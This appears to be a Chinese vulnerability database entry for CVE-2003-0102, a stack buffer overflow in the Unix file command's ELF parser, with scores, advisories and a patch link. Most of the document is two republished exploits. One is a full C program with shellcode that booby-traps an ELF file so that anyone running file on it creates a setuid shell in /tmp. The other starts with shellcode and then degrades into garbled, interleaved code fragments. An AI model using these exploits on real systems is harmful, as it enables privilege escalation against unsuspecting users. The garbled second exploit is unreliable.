r ; } >
CVE-2003-0102
CVSS4.6
发布时间 :2003-03-18 00:00:00
修订时间 :2016-10-17 22:29:32
NMCOES    

[原文]Buffer overflow in tryelf() in readelf.c of the file command allows attackers to execute arbitrary code as the user running file, possibly via a large entity size value in an ELF header (elfhdr.e_shentsize).


[CNNVD]file工具本地缓冲区溢出漏洞(CNNVD-200303-058)

        
        file(1)是一款查看文件类型的工具。
        file(1)命令存在一个缓冲区溢出漏洞,本地攻击者可以利用这个漏洞以执行用户权限在系统上执行任意指令。
        问题存在于readelf.c中的587行tryelf()函数的doshn()调用中:
        doshn(class, swap,
        fd,
        getu32(swap, elfhdr.e_shoff),
        getu16(swap, elfhdr.e_shnum),
        getu16(swap, elfhdr.e_shentsize));
        doshn() 'elfhdr.e_shentsize'最后一个参数将在之后用于readelf.c 133行的read()函数中:
        if (read(fd, sh_addr, size) == -1)
        read()调用会拷贝'size'字节到readelf.c 92行定义的'sh_addr'变量中:
        #define sh_addr (class == ELFCLASS32 \
         ? (void *) &sh32 \
         : (void *) &sh64)
        用于read()函数的缓冲区大小只有0x20 (32)字节,通过提供0x28 (40)字节的'size'参数可导致覆盖堆栈中的EBP和EIP寄存器而以其他用户权限执行任意代码。
        用户可以构建恶意文件诱使其他用户来分析,导致发生缓冲区溢出,而以执行用户权限执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:file:file:3.30
cpe:/a:file:file:3.32
cpe:/a:file:file:3.33
cpe:/a:file:file:3.40
cpe:/a:file:file:3.28
cpe:/a:file:file:3.39
cpe:/a:file:file:3.34
cpe:/a:file:file:3.35
cpe:/a:file:file:3.36
cpe:/o:netbsd:netbsd:1.5.1NetBSD 1.5.1
cpe:/a:file:file:3.37
cpe:/o:netbsd:netbsd:1.5.3NetBSD 1.5.3
cpe:/o:netbsd:netbsd:1.5.2NetBSD 1.5.2
cpe:/o:netbsd:netbsd:1.6NetBSD 1.6
cpe:/o:netbsd:netbsd:1.5NetBSD 1.5

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0102
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0102
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200303-058
(官方数据源) CNNVD

- 其它链接及资源

ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2003-003.txt.asc
(UNKNOWN)  NETBSD  NetBSD-SA2003-003
http://lwn.net/Alerts/34908/
(UNKNOWN)  IMMUNIX  IMNX-2003-7+-012-01
http://marc.info/?l=bugtraq&m=104680706201721&w=2
(UNKNOWN)  BUGTRAQ  20030304 iDEFENSE Security Advisory 03.04.03: Locally Exploitable Buffer Overflow in file(1)
http://www.debian.org/security/2003/dsa-260
(UNKNOWN)  DEBIAN  DSA-260
http://www.idefense.com/advisory/03.04.03.txt
(VENDOR_ADVISORY)  MISC  http://www.idefense.com/advisory/03.04.03.txt
http://www.kb.cert.org/vuls/id/611865
(UNKNOWN)  CERT-VN  VU#611865
http://www.mandrakesoft.com/security/advisories?name=MDKSA-2003:030
(UNKNOWN)  MANDRAKE  MDKSA-2003:030
http://www.novell.com/linux/security/advisories/2003_017_file.html
(UNKNOWN)  SUSE  SuSE-SA:2003:017
http://www.redhat.com/support/errata/RHSA-2003-086.html
(UNKNOWN)  REDHAT  RHSA-2003:086
http://www.redhat.com/support/errata/RHSA-2003-087.html
(UNKNOWN)  REDHAT  RHSA-2003:087
http://www.securityfocus.com/bid/7008
(VENDOR_ADVISORY)  BID  7008
http://xforce.iss.net/xforce/xfdb/11469
(UNKNOWN)  XF  file-afctr-read-bo(11469)

- 漏洞信息

file工具本地缓冲区溢出漏洞
中危 边界条件错误
2003-03-18 00:00:00 2005-05-13 00:00:00
本地  
        
        file(1)是一款查看文件类型的工具。
        file(1)命令存在一个缓冲区溢出漏洞,本地攻击者可以利用这个漏洞以执行用户权限在系统上执行任意指令。
        问题存在于readelf.c中的587行tryelf()函数的doshn()调用中:
        doshn(class, swap,
        fd,
        getu32(swap, elfhdr.e_shoff),
        getu16(swap, elfhdr.e_shnum),
        getu16(swap, elfhdr.e_shentsize));
        doshn() 'elfhdr.e_shentsize'最后一个参数将在之后用于readelf.c 133行的read()函数中:
        if (read(fd, sh_addr, size) == -1)
        read()调用会拷贝'size'字节到readelf.c 92行定义的'sh_addr'变量中:
        #define sh_addr (class == ELFCLASS32 \
         ? (void *) &sh32 \
         : (void *) &sh64)
        用于read()函数的缓冲区大小只有0x20 (32)字节,通过提供0x28 (40)字节的'size'参数可导致覆盖堆栈中的EBP和EIP寄存器而以其他用户权限执行任意代码。
        用户可以构建恶意文件诱使其他用户来分析,导致发生缓冲区溢出,而以执行用户权限执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Christos Zoulas
        ---------------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        ftp://ftp.astron.com/pub/file/file-3.41.tar.gz

- 漏洞信息 (22324)

File 3.x Local Stack Overflow Code Execution Vulnerability (1) (EDBID:22324)
unix local
2003-03-04 Verified
0 lem0n
N/A [点击下载]
source: http://www.securityfocus.com/bid/7008/info

It has been reported that a stack overflow exists in the file program. Although details of this issue are currently unavailable, it is likely that this issue could be exploited to execute code as the user invoking file. 

/*
** elfrape BY lem0n (lem0nxx@hotmail.com)
** a glorified stack overflow in file<=3.39 
**
** "lame code for a lame bug"
**
** this bug was discovered by iDEFENSE retards
** (actually i discovered it and they bought it from 
** me for $8, all that it is really worth)
**
** this code is mainly proof of concept and it has very little use
** "in the wild" unless your sysadmins and friends are morons.
**
** specify a valid elf binary, and elfrape will patch it so that
** it will exploit a stack overflow in file<=3.39.  this exploit
** relies on the victim user (possibly root, but not required) to
** run file <patchedbinary>.
**
** a glorified stack overflow in file<=3.39
** 
** file-3.37/readelf.c:tryelf()
**   doshn(class, swap,
**         fd,
**         getu32(swap, elfhdr.e_shoff),
**         getu16(swap, elfhdr.e_shnum),
**         getu16(swap, elfhdr.e_shentsize));
**
** note that we can manipulate elfhdr. 
** in doshn() we find a very bad thing...
**
** file-3.37/readelf.c:doshn()
**  if (read(fd, sh_addr, size) == -1)
**
** now, fd is the file its processing, sh_addr is the address of a 32 byte char.  
** size is the value read from the header (elfhdr.e_shentsize).  So we make 
** e_shentsize bigger then it should and voila, we got eip pretty easily.  
** the shellcode cant easily be placed after the address however because file is very 
** sensitive about its fd and the loop variable num being overwritten (it will either
** complain about bad fd and exit or hang in the loop). trying to preserve the values of
** each seemed stupid, so i found the best spot for
** the shellcode placement was in the beginning of the file, after the elf header
** because in the beginning of processing, file reads HOWMANY bytes from the start of the
** file onto the stack.
**     
** #define HOWMANY 16384
**
** that makes for a pretty large landing pad, pop a few thousand nops in there
** and this should be a pretty reliable method.
**
** the shellcode also makes sure to output a seemingly genuine result, which will
** always be filename: data
**
** (16:11)[lem0n@keystone:~/audit/file]$cp /bin/sln sln
** (16:11)[lem0n@keystone:~/audit/file]$./elfrape -t 0 -f sln
**  elfrape file<=3.39 priveledge escalation exploit (by lem0n (lem0nxx@hotmail.com)
**   [patching sln, trying to hit 0xbfffbab0]
**   [setting section header size to trigger overwrite (0x32 bytes)]
**   [setting section header entries to 1 to avoid a big mess on the stack]
**   [writing new header to file]
**   [writing target address to file @offset 0x5f4f0]
**   [filling file with nops and shell code @offset 0x34]
**   [exploit done]
** after someone runs 'file sln', execute /tmp/.sh
** (16:11)[lem0n@keystone:~/audit/file]$cp sln /tmp/whatami
** (16:11)[lem0n@keystone:~/audit/file]$echo and now we wait...
**
** typical sp offsets for -o mode are from -2000 to -6000 
** 
** Will create a 6755 /bin/.sh :>
** 
** Note: may not work if used on files less than 8k or so.
*/
#include <stdio.h>
#include <fcntl.h>
#include <sys/types.h>
#include <errno.h>
#include <string.h>
#define MAX_FILENAME 17/* the longest filename i suggest you use */
#define SHELL "/bin/ash"/* a shell that doesnt do seteuid(getuid()); ash,ksh,zsh,etc */
#define LANDING_SIZE 8192/* pretty big considering its just nops and shellcode */
/* shellcode shamelessly stolen (from ?) and modified */
char shellcode[] =
  "\x31\xc0\x31\xdb\x31"
  "\xd2"
  "\x68" "\x00\x00\x00\x00"
  "\x68" "\x00\x00\x00\x00"
  "\x68" "\x00\x00\x00\x00"
  "\x68" "\x00\x00\x00\x00"
  "\x68" "\x00\x00\x00\x00"
  "\x68" "\x00\x00\x00\x00"
  "\x68" "\x00\x00\x00\x00"
  "\x89\xe1\xb2\x20\x43\xb0\x04\xcd\x80\x31\xc0"
  "\xeb\x31\x5e\x89\x76\xac\x8d\x5e\x08\x89\x5e\xb0"
  "\x8d\x5e\x0b\x89\x5e\xb4\x31\xc0\x88\x46\x07\x88"
  "\x46\x0a\x88\x46\xab\x89\x46\xb8\xb0\x0b\x89\xf3"
  "\x8d\x4e\xac\x8d\x56\xb8\xcd\x80\x31\xdb\x89\xd8"
  "\x40\xcd\x80\xe8\xca\xff\xff\xff/bin/sh -c "
  "/bin/cp " SHELL " /tmp/.sh;chmod 6755 /tmp/.sh";
#define EI_NIDENT     16
typedef unsigned short int Elf32_Half;
typedef unsigned long int Elf32_Word;
typedef unsigned long int Elf32_Addr;
typedef unsigned long int Elf32_Off;
typedef struct
{
  unsigned char e_ident[EI_NIDENT];
  Elf32_Half e_type;
  Elf32_Half e_machine;
  Elf32_Word e_version;
  Elf32_Addr e_entry;
  Elf32_Off e_phoff;
  Elf32_Off e_shoff;
  Elf32_Word e_flags;
  Elf32_Half e_ehsize;
  Elf32_Half e_phentsize;
  Elf32_Half e_phnum;
  Elf32_Half e_shentsize;
  Elf32_Half e_shnum;
  Elf32_Half e_shtrndx;
}
Elf32_Ehdr;
struct targets
{
  int target;
  char *description;
  Elf32_Half e_shentsize;
  Elf32_Off e_shoff_delta;
  unsigned long int addr;
};
struct targets targets[] = {
  {0, "Slackware 8.1 (file-3.37-3.1)", 50, 44, 0xbfffc19c},
  {1, "Red Hat Linux release 7.2 (Enigma) (file-3.35)", 80, 76, 0xbfffc19c},
  {2, "Red Hat Linux release 6.2 (Zoot) (file-3.28)", 50, 44, 0xbfffc19c},
  {0, NULL, 0, 0, 0}
};
extern char *optarg;
extern int optind;
void prepare_write_shellcode (char *program);
unsigned long get_sp (void);
void usage (char *argv0);
unsigned long
get_sp (void)
{
  __asm__ ("movl %esp,%eax");
}
int
main (int argc, char *argv[])
{
  int offset, fd, ix, nbytes, c, target = -1;
  unsigned char buff[sizeof (Elf32_Ehdr)];
  unsigned char attack[LANDING_SIZE];
  unsigned char *file = NULL;
  Elf32_Ehdr *ehdr;
  Elf32_Off e_shoff;
  Elf32_Half e_shnum;
  Elf32_Half e_shentsize = 50;
  Elf32_Off e_shoff_delta;
  unsigned long int addr = 1;
  while ((c = getopt (argc, argv, "t:f:o:")) != -1)
    {
      switch (c)
{
case 't':
  target = atoi (optarg);
  break;
case 'f':
  file = (char *) strdup (optarg);
  break;
case 'o':
  addr = 0;
  offset = atoi (optarg);
  break;
default:
  usage (argv[0]);
  break;
}
    }
  printf
    ("elfrape file<=3.39 priveledge escalation exploit (by lem0n (lem0nxx@hotmail.com)\n");
  if (!(file) || ((target == -1) && (addr)))
    usage (argv[0]);
  if (strchr(file,'/'))
   { printf("NO fucking slashes douchebag\n"); exit(-1); }
  
  if (strlen(file) > MAX_FILENAME)
   { printf("Smaller filename please, unless you feel like editing the shell code\n");exit(-1); }
  if (target >= 0)
    {
      if (target >= sizeof (targets) / sizeof (targets[0]) - 1)
{
  fprintf (stderr, "Invalid type\n");
  exit (-1);
}
      e_shentsize = targets[target].e_shentsize;
      e_shoff_delta = targets[target].e_shoff_delta;
      addr = targets[target].addr;
    }
  if ((fd = open (file, O_RDWR)) < 0)
    {
      perror ("open()");
      exit (-1);
    }
  if ((nbytes = read (fd, (char *) buff, sizeof (Elf32_Ehdr))) == -1)
    {
      error ("read failed (%s).\n", strerror (errno));
      exit (-1);
    }
  ehdr = (Elf32_Ehdr *) buff;
  if (addr == 0)
    addr = get_sp () - offset;/* we have a big enough landing point that this addr should work */
  printf ("  [patching %s, tring to hit 0x%x]\n", file, addr);
  printf
    ("  [setting section header size to trigger overwrite (0x%x bytes)]\n",
     e_shentsize);
  ehdr->e_shentsize = e_shentsize;
  printf
    ("  [setting section header entries to 1 to avoid a big mess on the stack]\n");
  ehdr->e_shnum = 1;
/* write the new elf header to the file */
  printf ("  [writing new header to file]\n");
  if (lseek (fd, 0, SEEK_SET) == (off_t) - 1)
    {
      perror ("lseek()");
      exit (-1);
    }
  if (write (fd, buff, sizeof (*ehdr)) == -1)
    {
      perror ("write()");
      exit (-1);
    }
/* seek to where we want our address to wait */
  printf ("  [writing target address to file @offset 0x%x]\n",
  ehdr->e_shoff + e_shoff_delta);
  if (lseek (fd, ehdr->e_shoff + e_shoff_delta, SEEK_SET) == (off_t) - 1)
    {
      perror ("lseek()");
      exit (-1);
    }
  write (fd, &addr, 4);
  memset (attack, 0x90, LANDING_SIZE);
  prepare_write_shellcode (file);
  memcpy (attack + LANDING_SIZE - sizeof (shellcode) - 1, shellcode,
  sizeof (shellcode));
  attack[LANDING_SIZE - 1] = 0x0;
  printf ("  [filling file with nops and shell code @offset 0x%x]\n",
  sizeof (*ehdr));
/* set offset to just after the header, where our code will be */
  if (lseek (fd, sizeof (*ehdr), SEEK_SET) == (off_t) - 1)
    {
      perror ("lseek()");
      exit (-1);
    }
  if (write (fd, attack, LANDING_SIZE) == -1)
    {
      perror ("write()");
      exit (-1);
    }
  printf ("  [exploit done]\n");
  printf ("after someone runs 'file %s', execute /tmp/.sh\n", file);
  close (fd);
  return 0;
}
void
usage (char *argv0)
{
  int ix = 0;
  printf ("Usage: %s -t <target num> -f <existing elf binary filename>\n",
  argv0);
  printf
    ("       %s -o <offset from sp> -f <existing elf binary filename>\n\n",
     argv0);
  while (targets[ix].target || ix == 0)
    {
      printf ("\t#%d: %s\n", targets[ix].target, targets[ix].description);
      ix++;
    }
  exit (-1);
}
/* a quick and dirty hack to let the shellcode have the correct filename */
void
prepare_write_shellcode (char *program)
{
  char *buf;
  int ix;
  char *ptr = shellcode + 37;
  buf = (char *) malloc (strlen (program) + strlen (": data\n"));
  memcpy (buf, program, strlen (program));
  memcpy (buf + strlen (program), ": data\n", 7);
  for (ix = 0; ix < strlen (buf); ix++)
    {
      if (ix && (ix % 4 == 0))
ptr -= 9;
      *ptr = buf[ix];
      ptr++;
    }
  free (buf);
  return;
}
		

- 漏洞信息 (22325)

File 3.x Local Stack Overflow Code Execution Vulnerability (2) (EDBID:22325)
unix local
2003-03-04 Verified
0 lem0nxx
N/A [点击下载]
source: http://www.securityfocus.com/bid/7008/info
 
It has been reported that a stack overflow exists in the file program. Although details of this issue are currently unavailable, it is likely that this issue could be exploited to execute code as the user invoking file. 

/*
** file(1) exploit for *bsd,linux
** does cp /bin/sh /tmp/.sh;chmod 4755 /tmp/.sh and also
** echos the correct filename followed by ": data"
** this one actually works w/o silly targets or offsets
** cmdshellcode by *://lsd-pl.net/
** lem0nxx@hotmail.com
*/
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/types.h>
#include <errno.h>
/* elf stuff */
#define EI_NIDENT       16
#define ET_EXEC         2
#define EM_VPP500       17/* Fujitsu VPP500! */
#define EV_CURRENT      1
#define FILESIZE 16384
typedef unsigned short int Elf32_Half;
typedef unsigned long int Elf32_Word;
typedef unsigned long int Elf32_Addr;
typedef unsigned long int Elf32_Off;
typedef struct
{
  unsigned char e_ident[EI_NIDENT];
  Elf32_Half e_type;
  Elf32_Half e_machine;
  Elf32_Word e_version;
  Elf32_Addr e_entry;
  Elf32_Off e_phoff;
  Elf32_Off e_shoff;
  Elf32_Word e_flags;
  Elf32_Half e_ehsize;
  Elf32_Half e_phentsize;
  Elf32_Half e_phnum;
  Elf32_Half e_shentsize;
  Elf32_Half e_shnum;
  Elf32_Half e_shtrndx;
}
Elf32_Ehdr;
unsigned long
get_sp (void)
{
  __asm__ ("movl %esp,%eax");
}
unsigned char linux_code[] =
  "\xeb\x22\x59\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
  "\xe3\x50\x66\x68\x2d\x63\x89\xe7\x50\x51\x57\x53\x89\xe1\x99\xb0\x0b"
  "\xcd\x80\xe8\xd9\xff\xff\xff";
unsigned char bsd_code[] =
  "\xeb\x25\x59\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
  "\xe3\x50\x66\x68\x2d\x63\x89\xe7\x50\x51\x57\x53\x89\xe7\x50\x57\x53"
  "\x50\xb0\x3b\xcd\x80\xe8\xd6\xff\xff\xff";
unsigned char cmd[] =
  "echo %s: data;/bin/cp /bin/%s /tmp/.sh;chmod 4755 /tmp/.sh";
unsigned char *prepare_code (unsigned char *os_code, unsigned char *filename,
     unsigned char *shell, int *code_len);
int
main (int argc, char *argv[])
{
  unsigned char *final_code, *os_code, *shell, *attackbuff;
  int fd, ix, code_len;
  Elf32_Ehdr *ehdr;
  if (!(attackbuff = (char *) malloc (FILESIZE)))
    {
      fprintf (stderr, "malloc error\n");
      exit (-1);
    }
  ehdr = (Elf32_Ehdr *) attackbuff;
  if (argc < 3)
    {
      fprintf (stderr, "Usage: %s <filename> <bsd|linux>\n", argv[0]);
      exit (-1);
    }
  switch (argv[2][0])
    {
    case 'l':
    case 'L':
      os_code = linux_code;
      if (!(shell = strdup ("ash")))
{
  fprintf (stderr, "strdup error\n");
  exit (-1);
}
      break;
    case 'b':
    case 'B':
      os_code = bsd_code;
      if (!(shell = strdup ("tcsh")))/* does tcsh drop privs tho? ah well */
{
  fprintf (stderr, "strdup error\n");
  exit (-1);
}
      break;
    default:
      fprintf (stderr, "Invalid target ost;strdup error\n");
  exit (-1);
f(shell ad9rreak l.n;tctcshuotfot;)))/ad9rintf quoP
  '(f char *derr, &quoet="_bli
tyrdup error\n");
  exit (-1);
}
      break;
csh")0
}
      break;
csh")0
}
      bre- sizeof (s %dssing, fo
   {      printf t="_b (-1);
  if (
  ?)0
}
 BSD argv0):)0
}
 LINUXe> &l)0
}
       brea  write (fd, &ad
    }, 4);
kbuff = ( write (fd, &ad
    }, 0= read (fd, (char *) bre_write_shellcode dr *e+V_CURRENT -l)0
}
    [])
{
  un)0
}
      br/* beginnipossi == -1)os thrintfhwe want oelta);
  ict
{
0  atta7f; includemagictfhwe want oelta);
  ict
{
  at'E'ss on the stack]ct
{
2  at'L'ss on the stack]ct
{
3  at'F'ss on the stack]ct
{
4  attac1addr to plaibjd as want oelta);
  ict
{
5  attac1addrLSB want oelta);
  iNIDE atNIDENT addr_co filwanna kdr, sgosgoog
**
 want oelta);
  i e_type atNEXEC    ss on the stack]machine atNtsu VPP50ss on the stack]\no *ehdread (fd, (char *) ss on the stack]e_flagehdread (fd, (char *) ss on the stack]hentsize);
2048ss on the stack]\n"tac001 ": data\n", 7);256quot;+= 4kbuff;
  if (ar*(_Addr }
llcode dr *e+V the stack]e_flage+uot) if (addr == 0)1   ss ontargets[target].addr;
   break;O_WRONLY |;O_CREAT |;O_TRUNC((fd = open (file, O_RDWR)) < 0)
    {
      perror ("open()");
      exit (-1);
    }
    }kbuff = (fd, attack, LANDING_SIZE) == -1)
    {
      perror ("write()");
  p/.sh\n", 
    li
tyrdup er
    [])
{
      break;
csh"it (-1);
f(Usne runs 'f issga a stacactuallyuiNoteceually but "aft  printf t="_b (-1)ea  writeak;
csh")0
}
 Mdr.ethe shs you fee filcopash&q'ttcsh"), "Invalifile);
  clos/ by &qufuncelf.c oft;: ck and dirty hissud chll elegitutput a, fo
   {  wantrgc, char *argvcorrect fi
unsigned char *prepare_code (unsigned char *os_code, unsignned char *filename,
     un
    (int argc, char *argvtten et
    n
  _code; for are_cod)
    n
  _+code; for ff&)
    n
  _+code; for *os_code= 0)2
    n
  _+code; for li
tyr 0)2
    _code tten et
ehdr;
  if (!(attacn
   char *) malloc (FILESIZE)))
    {
      fprintf (stderr, "malloc error\n");
  ite_sheltten et
, are_code de; for are_cod)n"sLESIZE))tten et
e+ de; for are_cod),xff&,lso
** ek;
csh&
csh&
csht="_bli
tyrdup efile);
tten et
   free (buf);
  return;
}